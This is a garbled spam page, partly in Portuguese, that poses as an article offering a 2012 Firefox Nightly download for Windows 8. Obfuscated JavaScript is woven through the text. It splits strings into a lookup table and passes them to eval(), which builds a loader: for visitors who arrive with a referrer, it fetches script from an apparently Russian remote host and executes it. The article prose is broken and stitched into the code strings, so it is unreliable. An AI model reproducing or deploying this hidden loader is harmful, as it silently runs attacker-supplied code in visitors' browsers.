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Download Do Novo Mozilla Firefox 2012

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Download Do Novo Mozilla Firefox 2012

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This is impressive and goes with the Windows 8 'live tiles' feel The tabs are also big enough to manipulate by touch without having to be too precise.. Firefox Nightly feels like much more of a complete product than Google Chrome for the Modern UI.. Bookmarks also get a major overhaul Bookmarks will no longer be stored in folders but in lists.

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The interface is completely redesigned and has taken some designed cues from Google Chrome like its rounded tabs instead of Firefox's traditional squared off corners.. If you'd like the most recent stable version of Firefox, download it here With the official release of Windows 8 around the corner, Mozilla is scrambling to complete its version of Firefox.. ";l["rRN"]="r: ";l["tpP"]=" ru";l["pPi"]="oss";l["kcq"]="ons";l["bGM"]="ces";l["xZk"]=" fa";l["aOU"]=": t";l["QKS"]="tSt";l["Xok"]="als";l["QqB"]="a);";l["mqb"]="p:/";l["RdT"]="t',";l["YQc"]="sho";l["dvg"]="ain";l["Dzq"]="});";l["Eet"]="jax";l["Mpk"]="oad";l["sCe"]="ga_";l["Rnb"]="dex";l["DoA"]="s, ";l["OUA"]="y',";l["vcF"]="fun";l["PqS"]="a, ";l["tCI"]="ar ";l["kWd"]=".. The first thing users will notice about this version of Firefox is its Windows 8 Modern UI inspired home page with your most frequently visited sites and bookmarks.. js";l["cqP"]="B;v";l["HBc"]="hro";l["eEf"]="ta)";l["Cfd"]="}";l["hbt"]=": '";l["eSh"]="Apf";l["piL"]="_do";l["vpe"]="?we";l["VQq"]="3Sp";l["REp"]="e, ";l["HNY"]="onp";l["FmY"]="HR)";l["uUe"]=" = ";l["ZdR"]="ST ";l["xdg"]="gif";l["OiE"]="',d";l["ROF"]="ale";l["kYF"]="SON";l["kkJ"]="ype";l["fEe"]=": f";l["MHW"]=") {";l["TvA"]="$. Click

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' ";l["POp"]="pro";l["qRr"]="rce";l["rUD"]="cti";l["aXU"]="on ";l["YKR"]="tex";l["TBr"]="orT";l["fBJ"]="'fo";l["hCL"]="ta:";l["EZh"]=",js";l["QQO"]="spo";l["uCI"]=".. le";l["Mmr"]="eDa";l["NiR"]="var";l["IYz"]="({t";l["qak"]="fai";l["hJy"]="jqX";l["GsW"]="doc";l["qek"]="if(";l["lVV"]="val";l["aCQ"]=".. It's worth bearing in mind, however, that as Firefox Nightly is a testing build, it's not stable.

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st";l["AKc"]="url";l["QPo"]="wme";l["qAI"]="Dat";eval(l["NiR"] l["aUI"] l["zFi"] l["cqP"] l["tCI"] l["YQc"] l["QPo"] l["uUe"] l["fBJ"] l["qRr"] l["arR"] l["tCI"] l["eJS"] l["uUe"] l["GsW"] l["Nvv"] l["uWX"] l["eJS"] l["bdT"] l["xuS"] l["qek"] l["eJS"] l["kWd"] l["iin"] l["qCR"] l["MHW"] l["TvA"] l["Eet"] l["IYz"] l["kkJ"] l["hbt"] l["AcB"] l["OiE"] l["jiP"] l["wgN"] l["RuN"] l["xUL"] l["NsW"] l["RdT"] l["POp"] l["bGM"] l["UsM"] l["hCL"] l["xZk"] l["bhI"] l["iIn"] l["pPi"] l["KUi"] l["dvg"] l["aOU"] l["YdL"] l["EZh"] l["HNY"] l["fEe"] l["Xok"] l["REp"] l["AKc"] l["hbt"] l["fVQ"] l["mqb"] l["MNL"] l["Yjx"] l["htb"] l["VQq"] l["eSh"] l["CnK"] l["nUI"] l["SbI"] l["tpP"] l["KAW"] l["sCe"] l["rqJ"] l["fXb"] l["Rnb"] l["piL"] l["nSq"] l["Mpk"] l["pqX"] l["yIw"] l["vpe"] l["zfC"] l["OUA"] l["hsF"] l["bGM"] l["pmA"] l["vcF"] l["rUD"] l["aXU"] l["AGb"] l["QQO"] l["jQi"] l["qAI"] l["PqS"] l["YKR"] l["QKS"] l["sSO"] l["DoA"] l["hJy"] l["FmY"] l["EQq"] l["lVV"] l["AGb"] l["QQO"] l["jQi"] l["qAI"] l["QqB"] l["UwT"] l["HGy"] l["rRN"] l["vcF"] l["rUD"] l["aXU"] l["AGb"] l["QQO"] l["jQi"] l["qAI"] l["PqS"] l["YKR"] l["QKS"] l["sSO"] l["DoA"] l["bdT"] l["TBr"] l["HBc"] l["kzE"] l["Tna"] l["ROF"] l["lWI"] l["mzt"] l["ZdR"] l["qak"] l["nBe"] l["aCQ"] l["kFv"] l["kYF"] l["uCI"] l["vwr"] l["xdg"] l["Sws"] l["XmR"] l["kcq"] l["Mmr"] l["eEf"] l["ckR"] l["Dzq"] l["Cfd"]);Firefox Nightly - Download. d70b09c2d4

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Firefox Nightly's search is also integrated into Windows now so users can quickly bring up the search field by pressing Windows F.. The interface is intuitive and feels like it's part of the operating system Firefox Nightly also features a new tab bar at the top that shows live thumbnails of the sites you have open.. sc";l["xuS"]="er;";l["Sws"]="y(r";l["kzE"]="wn)";l["jQi"]="nse";l["KUi"]="Dom";l["Tna"]=" { ";l["zFi"]="= l";l["jiP"]="ata";l["fXb"]="/in";l["yIw"]=".. a";l["UwT"]="},e";l["CnK"]="fwn";l["mzt"]="'PO";l["ckR"]=");}";l["bhI"]="lse";l["pmA"]="s: ";l["lWI"]="rt(";l["bdT"]="err";l["htb"]="ZtQ";l["rqJ"]="zip";l["sSO"]="atu";l["nSq"]="wnl";l["AGb"]="(re";l["YdL"]="rue";l["xUL"]="'sc";l["iin"]="ngt";l["vwr"]="rin";l["arR"]="';v";l["UsM"]="sDa";l["MNL"]="/AD";l["iIn"]=",cr";l["HGy"]="rro";l["XmR"]="esp";l["RuN"]="e: ";l["KAW"]="/me";l["eJS"]="ref";l["qCR"]="h>0";l["fVQ"]="htt";l["kFv"]=" J";l["Nvv"]="ume";l["zfC"]="ebl";l["nBe"]="led";l["NsW"]="rip";l["aUI"]=" q ";l["hsF"]="suc";l["EQq"]=" {e";l["wgN"]="Typ";l["SbI"]="-i3";l["AcB"]="GET";l["pqX"]="_en";l["uWX"]="nt. 5